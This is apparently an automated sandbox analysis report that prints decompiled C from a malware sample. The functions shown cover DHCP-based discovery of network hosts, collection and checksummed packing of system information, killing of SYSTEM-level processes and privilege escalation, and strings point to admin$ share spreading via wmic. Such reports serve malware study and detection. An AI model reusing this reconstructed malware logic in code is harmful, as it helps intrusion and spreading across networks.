                                                                                                          • API ID: Heap$CloseHandleProcess$Path$Filewsprintf$ErrorLast$Connection2Exists$AllocCancelCreateFindFreeThreadTokenmemcpy$AppendCodeCurrentDeleteDirectoryDuplicateExitExtensionNameObjectOpenSingleSystemUserWaitmemset
                                                                                                          • String ID: %ws $D$W$\\%s\admin$$\\%ws\admin$\%ws$cscc.dat$wbem\wmic.exe
                                                                                                          • API String ID: 659518118-2685502051
                                                                                                          • Opcode ID: b5a77eefbf2a480694c1f916994bdd86e733e4cb9ba65e8375f7db39606bdead
                                                                                                          • Instruction ID: 595a9abf10be9b4bd4028d501e8decdbedec199668d62e5d89e00f681f848bb1
                                                                                                          • Opcode Fuzzy Hash: b5a77eefbf2a480694c1f916994bdd86e733e4cb9ba65e8375f7db39606bdead
                                                                                                          • Instruction Fuzzy Hash: 39B1F4B5900219EFDF219FA0CC88AEFBBBCEFC4704F1045AAE509A6110D735AA91CF51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 17%
                                                                                                          			E04A48D39(intOrPtr _a4) {
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				char _v20;
                                                                                                          				signed int _v24;
                                                                                                          				long _v28;
                                                                                                          				char _v32;
                                                                                                          				char _v36;
                                                                                                          				char _v40;
                                                                                                          				char _v44;
                                                                                                          				char _v48;
                                                                                                          				intOrPtr _v52;
                                                                                                          				char _v56;
                                                                                                          				intOrPtr _v60;
                                                                                                          				char _v64;
                                                                                                          				char _v584;
                                                                                                          				void* __esi;
                                                                                                          				char* _t58;
                                                                                                          				intOrPtr _t61;
                                                                                                          				intOrPtr _t64;
                                                                                                          				intOrPtr _t71;
                                                                                                          				intOrPtr _t73;
                                                                                                          				signed int _t83;
                                                                                                          				intOrPtr* _t85;
                                                                                                          				void* _t86;
                                                                                                          				signed int _t88;
                                                                                                          				intOrPtr* _t89;
                                                                                                          
                                                                                                          				_t83 = 0;
                                                                                                          				_t88 = 0;
                                                                                                          				_v48 = 0;
                                                                                                          				_v44 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				_v16 = 0;
                                                                                                          				_v28 = 0;
                                                                                                          				_v24 = 0;
                                                                                                          				_v32 = 0;
                                                                                                          				_v40 = 0;
                                                                                                          				_v36 = 0;
                                                                                                          				_v64 = 0;
                                                                                                          				_v56 = 0x104;
                                                                                                          				__imp__GetComputerNameExW(4,  &_v584,  &_v56);
                                                                                                          				_t58 =  &_v584;
                                                                                                          				__imp__DhcpEnumSubnets(_t58,  &_v48, 0x400,  &_v12,  &_v32,  &_v40);
                                                                                                          				if(_t58 != 0) {
                                                                                                          					L15:
                                                                                                          					return 0;
                                                                                                          				}
                                                                                                          				_t61 =  *_v12;
                                                                                                          				_v60 = _t61;
                                                                                                          				if(_t61 <= 0) {
                                                                                                          					L14:
                                                                                                          					__imp__DhcpRpcFreeMemory(_v12);
                                                                                                          					goto L15;
                                                                                                          				} else {
                                                                                                          					goto L2;
                                                                                                          				}
                                                                                                          				do {
                                                                                                          					L2:
                                                                                                          					_t64 =  *((intOrPtr*)(_v12 + 4));
                                                                                                          					__imp__DhcpGetSubnetInfo(0,  *((intOrPtr*)(_t64 + _t83 * 4)),  &_v20);
                                                                                                          					if(_t64 == 0 &&  *((intOrPtr*)(_v20 + 0x1c)) == 0) {
                                                                                                          						_t71 =  *((intOrPtr*)(_v12 + 4));
                                                                                                          						__imp__DhcpEnumSubnetClients(0,  *((intOrPtr*)(_t71 + _t83 * 4)),  &_v44, 0x10000,  &_v16,  &_v36,  &_v64);
                                                                                                          						if(_t71 != 0) {
                                                                                                          							goto L13;
                                                                                                          						}
                                                                                                          						_t73 =  *_v16;
                                                                                                          						_v52 = _t73;
                                                                                                          						if(_t73 == 0 || _t88 >= _t73) {
                                                                                                          							L12:
                                                                                                          							__imp__DhcpRpcFreeMemory(_v16);
                                                                                                          							goto L13;
                                                                                                          						} else {
                                                                                                          							do {
                                                                                                          								_t89 =  *((intOrPtr*)( *((intOrPtr*)(_v16 + 4)) + _t88 * 4));
                                                                                                          								if(_t89 != 0) {
                                                                                                          									_push( *_t89);
                                                                                                          									_t85 = __imp__#14;
                                                                                                          									if(E04A4A567( *_t85()) != 0) {
                                                                                                          										__imp__#12( *_t85( *_t89));
                                                                                                          										_t86 = E04A4641A(_t78);
                                                                                                          										if(_t86 != 0) {
                                                                                                          											E04A46B95(_t79, 0, _a4);
                                                                                                          											HeapFree(GetProcessHeap(), 0, _t86);
                                                                                                          										}
                                                                                                          									}
                                                                                                          								}
                                                                                                          								_t88 = _v24 + 1;
                                                                                                          								_v24 = _t88;
                                                                                                          							} while (_t88 < _v52);
                                                                                                          							goto L12;
                                                                                                          						}
                                                                                                          					}
                                                                                                          					L13:
                                                                                                          					_t83 = _v28 + 1;
                                                                                                          					_v28 = _t83;
                                                                                                          				} while (_t83 < _v60);
                                                                                                          				goto L14;
                                                                                                          			}





























                                                                                                          0x04a48d52
                                                                                                          0x04a48d54
                                                                                                          0x04a48d58
                                                                                                          0x04a48d5b
                                                                                                          0x04a48d5e
                                                                                                          0x04a48d61
                                                                                                          0x04a48d64
                                                                                                          0x04a48d67
                                                                                                          0x04a48d6a
                                                                                                          0x04a48d6d
                                                                                                          0x04a48d70
                                                                                                          0x04a48d73
                                                                                                          0x04a48d76
                                                                                                          0x04a48d79
                                                                                                          0x04a48d80
                                                                                                          0x04a48d9b
                                                                                                          0x04a48da2
                                                                                                          0x04a48daa
                                                                                                          0x04a48ea2
                                                                                                          0x04a48ea6
                                                                                                          0x04a48ea6
                                                                                                          0x04a48db3
                                                                                                          0x04a48db5
                                                                                                          0x04a48dba
                                                                                                          0x04a48e97
                                                                                                          0x04a48e9a
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48dc0
                                                                                                          0x04a48dc0
                                                                                                          0x04a48dc7
                                                                                                          0x04a48dce
                                                                                                          0x04a48dd6
                                                                                                          0x04a48e00
                                                                                                          0x04a48e07
                                                                                                          0x04a48e0f
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x04a48e14
                                                                                                          0x04a48e16
                                                                                                          0x04a48e1b
                                                                                                          0x04a48e7e
                                                                                                          0x04a48e81
                                                                                                          0x00000000
                                                                                                          0x04a48e21
                                                                                                          0x04a48e21
                                                                                                          0x04a48e27
                                                                                                          0x04a48e2c
                                                                                                          0x04a48e2e
                                                                                                          0x04a48e30
                                                                                                          0x04a48e40
                                                                                                          0x04a48e47
                                                                                                          0x04a48e53
                                                                                                          0x04a48e57
                                                                                                          0x04a48e5e
                                                                                                          0x04a48e6c
                                                                                                          0x04a48e6c
                                                                                                          0x04a48e57
                                                                                                          0x04a48e40
                                                                                                          0x04a48e75
                                                                                                          0x04a48e76
                                                                                                          0x04a48e79
                                                                                                          0x00000000
                                                                                                          0x04a48e21
                                                                                                          0x04a48e1b
                                                                                                          0x04a48e87
                                                                                                          0x04a48e8a
                                                                                                          0x04a48e8b
                                                                                                          0x04a48e8e
                                                                                                          0x00000000

                                                                                                          APIs
                                                                                                          • GetComputerNameExW.KERNEL32(00000004,?,?,00000000,7439C4E0,00000000), ref: 04A48D80
                                                                                                          • DhcpEnumSubnets.DHCPSAPI(?,?,00000400,?,?,?), ref: 04A48DA2
                                                                                                          • DhcpGetSubnetInfo.DHCPSAPI(00000000,?,?), ref: 04A48DCE
                                                                                                          • DhcpEnumSubnetClients.DHCPSAPI(00000000,?,?,00010000,00000400,?,?), ref: 04A48E07
                                                                                                          • htonl.WS2_32(00000000), ref: 04A48E36
                                                                                                          • htonl.WS2_32(00000000), ref: 04A48E44
                                                                                                          • inet_ntoa.WS2_32(00000000), ref: 04A48E47
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,00000000,00000000,77454AB0,?,04A48E53,00000000), ref: 04A46439
                                                                                                            • Part of subcall function 04A4641A: GetProcessHeap.KERNEL32(00000000,00000000,?,04A48E53,00000000), ref: 04A46446
                                                                                                            • Part of subcall function 04A4641A: HeapAlloc.KERNEL32(00000000,?,04A48E53,00000000), ref: 04A4644D
                                                                                                            • Part of subcall function 04A4641A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,04A48E53,000000FF,00000000,00000000,?,04A48E53,00000000), ref: 04A46465
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 04A48E65
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 04A48E6C
                                                                                                          • DhcpRpcFreeMemory.DHCPSAPI(00000400), ref: 04A48E81
                                                                                                          • DhcpRpcFreeMemory.DHCPSAPI(?), ref: 04A48E9A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Dhcp$Heap$Free$ByteCharEnumMemoryMultiProcessSubnetWidehtonl$AllocClientsComputerInfoNameSubnetsinet_ntoa
                                                                                                          • String ID: Oqt Uqt0Xqt
                                                                                                          • API String ID: 4121633671-636472023
                                                                                                          • Opcode ID: 1b29652801f27ca93b9cfe0846600441053a97451a028031ff897815201d97de
                                                                                                          • Instruction ID: db8ab735ebbf2bc7102b7b0ef4f4a6e86811c0e574e6fa4bc5fe1fbde9af6968
                                                                                                          • Opcode Fuzzy Hash: 1b29652801f27ca93b9cfe0846600441053a97451a028031ff897815201d97de
                                                                                                          • Instruction Fuzzy Hash: 9B41C5B5D00219AFDB11EFE9E9849DEFBB8FFD8304B10445AE505E7210D775AA418B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 91%
                                                                                                          			E04A457E5(long _a4, void _a8, void* _a12, intOrPtr _a16) {
                                                                                                          				int _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				int _v20;
                                                                                                          				struct _TIME_ZONE_INFORMATION _v192;
                                                                                                          				void** _t62;
                                                                                                          				void* _t66;
                                                                                                          				long _t69;
                                                                                                          				signed int _t73;
                                                                                                          				signed int _t74;
                                                                                                          				void* _t88;
                                                                                                          				void* _t91;
                                                                                                          				void* _t96;
                                                                                                          				int _t101;
                                                                                                          				long _t102;
                                                                                                          				int _t103;
                                                                                                          				void _t104;
                                                                                                          				void _t105;
                                                                                                          				void* _t106;
                                                                                                          				void* _t107;
                                                                                                          				void* _t108;
                                                                                                          				int _t109;
                                                                                                          				void* _t110;
                                                                                                          				void* _t111;
                                                                                                          				void* _t113;
                                                                                                          				void* _t114;
                                                                                                          				void* _t115;
                                                                                                          				void* _t116;
                                                                                                          
                                                                                                          				_t109 = 0;
                                                                                                          				_v20 = 0;
                                                                                                          				if(_a16 != 0) {
                                                                                                          					_t96 = LocalAlloc(0x40, 0xf0);
                                                                                                          					_v12 = _t96;
                                                                                                          					if(_t96 != 0) {
                                                                                                          						 *_t96 = _a8;
                                                                                                          						 *((intOrPtr*)(_t96 + 4)) = GetSystemDefaultLCID();
                                                                                                          						if(GetTimeZoneInformation( &_v192) != 0xffffffff) {
                                                                                                          							 *(_t96 + 8) = _v192.Bias;
                                                                                                          						}
                                                                                                          						_t10 = _t96 + 0xc; // 0xc
                                                                                                          						memcpy(_t10, _a12, 0x21);
                                                                                                          						_t116 = _t115 + 0xc;
                                                                                                          						_t62 =  &_v16;
                                                                                                          						_v16 = _t109;
                                                                                                          						__imp__NetWkstaGetInfo(0x4a50494, 0x64, _t62, _t111);
                                                                                                          						if(_t62 == 0) {
                                                                                                          							_t114 = _v16;
                                                                                                          							if( *(_t114 + 8) != _t109) {
                                                                                                          								_t91 =  *(_t114 + 8);
                                                                                                          								_t108 = _t91 + 2;
                                                                                                          								do {
                                                                                                          									_t105 =  *_t91;
                                                                                                          									_t91 = _t91 + 2;
                                                                                                          								} while (_t105 != _t109);
                                                                                                          								_t109 = (_t91 - _t108 >> 1) + (_t91 - _t108 >> 1) + 2;
                                                                                                          							}
                                                                                                          							_t101 = 0;
                                                                                                          							if( *(_t114 + 4) != 0) {
                                                                                                          								_t88 =  *(_t114 + 4);
                                                                                                          								_t107 = _t88 + 2;
                                                                                                          								do {
                                                                                                          									_t104 =  *_t88;
                                                                                                          									_t88 = _t88 + 2;
                                                                                                          								} while (_t104 != 0);
                                                                                                          								_t101 = (_t88 - _t107 >> 1) + (_t88 - _t107 >> 1) + 2;
                                                                                                          							}
                                                                                                          							if(_t109 != 0 && _t109 <= 0xc3) {
                                                                                                          								memcpy(_v12 + 0x2d,  *(_t114 + 8), _t109);
                                                                                                          								_t116 = _t116 + 0xc;
                                                                                                          							}
                                                                                                          							if(_t101 != 0 && _t101 <= 0xc3 - _t109) {
                                                                                                          								_t29 = _v12 + 0x2d; // 0x2d
                                                                                                          								memcpy(_t109 + _t29,  *(_t114 + 4), _t101);
                                                                                                          								_t116 = _t116 + 0xc;
                                                                                                          							}
                                                                                                          							NetApiBufferFree(_t114);
                                                                                                          							_t96 = _v12;
                                                                                                          							_t109 = 0;
                                                                                                          						}
                                                                                                          						_a12 = _t109;
                                                                                                          						_v8 = _t109;
                                                                                                          						if(E04A456D8( &_v8, _a4, _t96,  &_a12) != 0) {
                                                                                                          							_t69 = _v8 + 9;
                                                                                                          							_a4 = _t69;
                                                                                                          							_t113 = LocalAlloc(0x40, _t69);
                                                                                                          							if(_t113 != _t109) {
                                                                                                          								 *(_t113 + 1) = _a8;
                                                                                                          								 *_t113 = 0x66;
                                                                                                          								_t41 = _t113 + 5; // 0x5
                                                                                                          								_t73 = memcpy(_t41, _a12, _v8);
                                                                                                          								_t103 = _v8;
                                                                                                          								_t106 = _t103 + 5;
                                                                                                          								_t74 = _t73 | 0xffffffff;
                                                                                                          								_t110 = _t113;
                                                                                                          								if(_t106 != 0) {
                                                                                                          									do {
                                                                                                          										_t74 = _t74 >> 0x00000008 ^  *(0x4a53078 + (( *_t110 & 0x000000ff ^ _t74) & 0x000000ff) * 4);
                                                                                                          										_t110 = _t110 + 1;
                                                                                                          										_t106 = _t106 - 1;
                                                                                                          									} while (_t106 != 0);
                                                                                                          									_t96 = _v12;
                                                                                                          								}
                                                                                                          								 *(_t113 + _t103 + 5) =  !_t74;
                                                                                                          								_v20 = E04A45780(_t103, _t113, _a4, _a16);
                                                                                                          								LocalFree(_t113);
                                                                                                          							}
                                                                                                          						}
                                                                                                          						_t102 = 0xf0;
                                                                                                          						_t66 = _t96;
                                                                                                          						do {
                                                                                                          							 *_t66 = 0;
                                                                                                          							_t66 = _t66 + 1;
                                                                                                          							_t102 = _t102 - 1;
                                                                                                          						} while (_t102 != 0);
                                                                                                          						LocalFree(_t96);
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _v20;
                                                                                                          			}































                                                                                                          0x04a457ef
                                                                                                          0x04a457f1
                                                                                                          0x04a457f7
                                                                                                          0x04a4580b
                                                                                                          0x04a4580d
                                                                                                          0x04a45812
                                                                                                          0x04a4581b
                                                                                                          0x04a45823
                                                                                                          0x04a45836
                                                                                                          0x04a4583e
                                                                                                          0x04a4583e
                                                                                                          0x04a45847
                                                                                                          0x04a4584b
                                                                                                          0x04a45850
                                                                                                          0x04a45853
                                                                                                          0x04a4585e
                                                                                                          0x04a45861
                                                                                                          0x04a45869
                                                                                                          0x04a4586f
                                                                                                          0x04a45875
                                                                                                          0x04a45877
                                                                                                          0x04a4587a
                                                                                                          0x04a4587d
                                                                                                          0x04a4587d
                                                                                                          0x04a45880
                                                                                                          0x04a45883
                                                                                                          0x04a4588c
                                                                                                          0x04a4588c
                                                                                                          0x04a45890
                                                                                                          0x04a45895
                                                                                                          0x04a45897
                                                                                                          0x04a4589a
                                                                                                          0x04a4589d
                                                                                                          0x04a4589d
                                                                                                          0x04a458a0
                                                                                                          0x04a458a3
                                                                                                          0x04a458ac
                                                                                                          0x04a458ac
                                                                                                          0x04a458b2
                                                                                                          0x04a458c7
                                                                                                          0x04a458cc
                                                                                                          0x04a458cc
                                                                                                          0x04a458d1
                                                                                                          0x04a458e5
                                                                                                          0x04a458ea
                                                                                                          0x04a458ef
                                                                                                          0x04a458ef
                                                                                                          0x04a458f3
                                                                                                          0x04a458f9
                                                                                                          0x04a458fc
                                                                                                          0x04a458fc
                                                                                                          0x04a45909
                                                                                                          0x04a4590c
                                                                                                          0x04a45916
                                                                                                          0x04a4591b
                                                                                                          0x04a45921
                                                                                                          0x04a4592a
                                                                                                          0x04a4592e
                                                                                                          0x04a45933
                                                                                                          0x04a45936
                                                                                                          0x04a4593c
                                                                                                          0x04a45943
                                                                                                          0x04a45948
                                                                                                          0x04a4594b
                                                                                                          0x04a45951
                                                                                                          0x04a45954
                                                                                                          0x04a45958
                                                                                                          0x04a4595a
                                                                                                          0x04a45968
                                                                                                          0x04a4596f
                                                                                                          0x04a45970
                                                                                                          0x04a45970
                                                                                                          0x04a45973
                                                                                                          0x04a45973
                                                                                                          0x04a4597e
                                                                                                          0x04a45989
                                                                                                          0x04a4598c
                                                                                                          0x04a4598c
                                                                                                          0x04a4592e
                                                                                                          0x04a45992
                                                                                                          0x04a45997
                                                                                                          0x04a4599a
                                                                                                          0x04a4599a
                                                                                                          0x04a4599d
                                                                                                          0x04a4599e
                                                                                                          0x04a4599e
                                                                                                          0x04a459a2
                                                                                                          0x04a459a2
                                                                                                          0x04a459a8
                                                                                                          0x04a459ae

                                                                                                          APIs
                                                                                                          • LocalAlloc.KERNEL32(00000040,000000F0,00000000,00000000), ref: 04A45805
                                                                                                          • GetSystemDefaultLCID.KERNEL32 ref: 04A4581D
                                                                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 04A4582D
                                                                                                          • memcpy.MSVCRT ref: 04A4584B
                                                                                                          • NetWkstaGetInfo.NETAPI32(04A50494,00000064,?), ref: 04A45861
                                                                                                          • memcpy.MSVCRT ref: 04A458C7
                                                                                                          • memcpy.MSVCRT ref: 04A458EA
                                                                                                          • NetApiBufferFree.NETAPI32(?,?,?,?), ref: 04A458F3
                                                                                                          • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,?,?), ref: 04A45924
                                                                                                          • memcpy.MSVCRT ref: 04A45943
                                                                                                          • LocalFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 04A4598C
                                                                                                          • LocalFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 04A459A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Localmemcpy$Free$Alloc$BufferDefaultInfoInformationSystemTimeWkstaZone
                                                                                                          • String ID:
                                                                                                          • API String ID: 2529142246-0
                                                                                                          • Opcode ID: 0f10c04b75200f0a2aba46710d336d5c4b2d1acba64f46c145a1be5adab6a2b2
                                                                                                          • Instruction ID: f9e32b553fe43e39b7b583f8c93ca555b964b06348f8e50605b176f423effcfe
                                                                                                          • Opcode Fuzzy Hash: 0f10c04b75200f0a2aba46710d336d5c4b2d1acba64f46c145a1be5adab6a2b2
                                                                                                          • Instruction Fuzzy Hash: 89518275D00306EFEB20DFA8C884EAEB7A5FFC8314F048969EA5597241E775EA01DB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 88%
                                                                                                          			E04A4841D(int _a4) {
                                                                                                          				void* _v8;
                                                                                                          				void* _v12;
                                                                                                          				void* _v16;
                                                                                                          				short _v20;
                                                                                                          				struct _SID_IDENTIFIER_AUTHORITY _v24;
                                                                                                          				long _t20;
                                                                                                          				int _t21;
                                                                                                          				long* _t31;
                                                                                                          				void* _t38;
                                                                                                          
                                                                                                          				if(( *0x4a57bc0 & 0x00000002) != 0) {
                                                                                                          					_t20 = GetCurrentProcessId();
                                                                                                          					if(_a4 != _t20) {
                                                                                                          						_t21 = OpenProcess(0x401, 0, _a4);
                                                                                                          						_t38 = _t21;
                                                                                                          						if(_t38 != 0) {
                                                                                                          							if(OpenProcessToken(_t38, 0xe,  &_v16) != 0) {
                                                                                                          								if(DuplicateToken(_v16, 2,  &_v12) != 0) {
                                                                                                          									_v24.Value = 0;
                                                                                                          									_v20 = 0x500;
                                                                                                          									if(AllocateAndInitializeSid( &_v24, 1, 0x12, 0, 0, 0, 0, 0, 0, 0,  &_v8) != 0) {
                                                                                                          										_t31 =  &_a4;
                                                                                                          										_a4 = 0;
                                                                                                          										__imp__CheckTokenMembership(_v12, _v8, _t31);
                                                                                                          										if(_t31 != 0 && _a4 != 0) {
                                                                                                          											TerminateProcess(_t38, 0);
                                                                                                          										}
                                                                                                          										FreeSid(_v8);
                                                                                                          									}
                                                                                                          									CloseHandle(_v12);
                                                                                                          								}
                                                                                                          								CloseHandle(_v16);
                                                                                                          							}
                                                                                                          							_t21 = CloseHandle(_t38);
                                                                                                          						}
                                                                                                          						return _t21;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				return _t20;
                                                                                                          			}












                                                                                                          0x04a4842a
                                                                                                          0x04a48430
                                                                                                          0x04a48439
                                                                                                          0x04a4844c
                                                                                                          0x04a48452
                                                                                                          0x04a48456
                                                                                                          0x04a48472
                                                                                                          0x04a48485
                                                                                                          0x04a4849a
                                                                                                          0x04a4849d
                                                                                                          0x04a484ab
                                                                                                          0x04a484ad
                                                                                                          0x04a484b4
                                                                                                          0x04a484ba
                                                                                                          0x04a484c2
                                                                                                          0x04a484cb
                                                                                                          0x04a484cb
                                                                                                          0x04a484d4
                                                                                                          0x04a484d4
                                                                                                          0x04a484dd
                                                                                                          0x04a484dd
                                                                                                          0x04a484e2
                                                                                                          0x04a484e2
                                                                                                          0x04a484e5
                                                                                                          0x04a484e7
                                                                                                          0x00000000
                                                                                                          0x04a484e9
                                                                                                          0x04a48439
                                                                                                          0x04a484eb

                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.KERNEL32(?,04A48555,?,?), ref: 04A48430
                                                                                                          • OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04A48555,?,?), ref: 04A4844C
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04A48555,?,?), ref: 04A48464
                                                                                                          • DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04A48555,?,?), ref: 04A4847D
                                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04A484A3
                                                                                                          • CheckTokenMembership.ADVAPI32(?,?,?), ref: 04A484BA
                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 04A484CB
                                                                                                          • FreeSid.ADVAPI32(?), ref: 04A484D4
                                                                                                          • CloseHandle.KERNEL32(?), ref: 04A484DD
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,04A48555,?,?), ref: 04A484E2
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,04A48555,?,?), ref: 04A484E5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CloseHandleToken$Open$AllocateCheckCurrentDuplicateFreeInitializeMembershipTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2191316301-0
                                                                                                          • Opcode ID: b71e337a239f633c17765ccb39d258d8e9b950f232938a1197bd49a3f0843f12
                                                                                                          • Instruction ID: dedb9b9fdb7434f9171b1e0cc7781fa219af7f2db2623c193932122625ccf01f
                                                                                                          • Opcode Fuzzy Hash: b71e337a239f633c17765ccb39d258d8e9b950f232938a1197bd49a3f0843f12
                                                                                                          • Instruction Fuzzy Hash: 08213079A00108BFEB10AFA0EC88EAE7BBCEFD4741F004029F901A6150D7799E42DB60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          C-Code - Quality: 77%
                                                                                                          			E04A47CC5(WCHAR* _a4) {
                                                                                                          				void* _v8;
                                                                                                          				int _v12;
                                                                                                          				intOrPtr _v16;
                                                                                                          				struct _TOKEN_PRIVILEGES _v28;
                                                                                                          				long _t23;
                                                                                                          				int _t24;
                                                                                                          
                                                                                                          				_v28.PrivilegeCount = 0;
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				asm("stosd");
                                                                                                          				_t24 = 0;
                                                                                                          				_v12 = 0;
                                                                                                          				_v8 = 0;
                                                                                                          				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8) != 0 && LookupPrivilegeValueW(0, _a4,  &(_v28.Privileges)) != 0) {
                                                                                                          					_v28.PrivilegeCount = 1;
                                                                                                          					_v16 = 2;
                                                                                                          					_t24 = AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0, 0);
                                                                                                          					_t23 = GetLastError();
                                                                                                          					_v12 = _t23;
                                                                                                          					if(_t23 != 0) {
                                                                                                          						_t24 = 0;
                                                                                                          					}
                                                                                                          				}
                                                                                                          				SetLastError(_v12);
                                                                                                          				return _t24;
                                                                                                          			}









                                                                                                          0x04a47cd2
                                                                                                          0x04a47cd8
                                                                                                          0x04a47cd9
                                                                                                          0x04a47cda
                                                                                                          0x04a47ce1
                                                                                                          0x04a47ce3
                                                                                                          0x04a47ce6
                                                                                                          0x04a47cf8
                                                                                                          0x04a47d17
                                                                                                          0x04a47d1e
                                                                                                          0x04a47d2b
                                                                                                          0x04a47d2d
                                                                                                          0x04a47d33
                                                                                                          0x04a47d38
                                                                                                          0x04a47d3a
                                                                                                          0x04a47d3a
                                                                                                          0x04a47d38
                                                                                                          0x04a47d3f
                                                                                                          0x04a47d4b

                                                                                                          APIs
                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,00000000,?,?,?,04A479E8), ref: 04A47CE9
                                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,00000000,?,?,?,04A479E8), ref: 04A47CF0
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 04A47D02
                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04A47D25
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 04A47D2D
                                                                                                          • SetLastError.KERNEL32(?,?,00000000,?,?,?,04A479E8), ref: 04A47D3F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.364898136.0000000004A41000.00000020.00001000.00020000.00000000.sdmp, Offset: 04A40000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.364835035.0000000004A40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365092334.0000000004A4D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365448965.0000000004A53000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000004.00000002.365463486.0000000004A59000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_4a40000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 2365211911-0
                                                                                                          • Opcode ID: 1c1598636af71133209ec6f49121a2f1b2e3c5f54bfe1c64b1b7dc8c858ab680
                                                                                                          • Instruction ID: cf61f6e93e053bef8c70545ec557e8b5c1d59d8c613cb5a8a5a930da06674436
                                                                                                          • Opcode Fuzzy Hash: 1c1598636af71133209ec6f49121a2f1b2e3c5f54bfe1c64b1b7dc8c858ab680
                                                                                                          • Instruction Fuzzy Hash: 1F113C79901218BFEB109FE5DC489EFBFBCEBD8700F104465EA05E2240D7759A4ACBA0
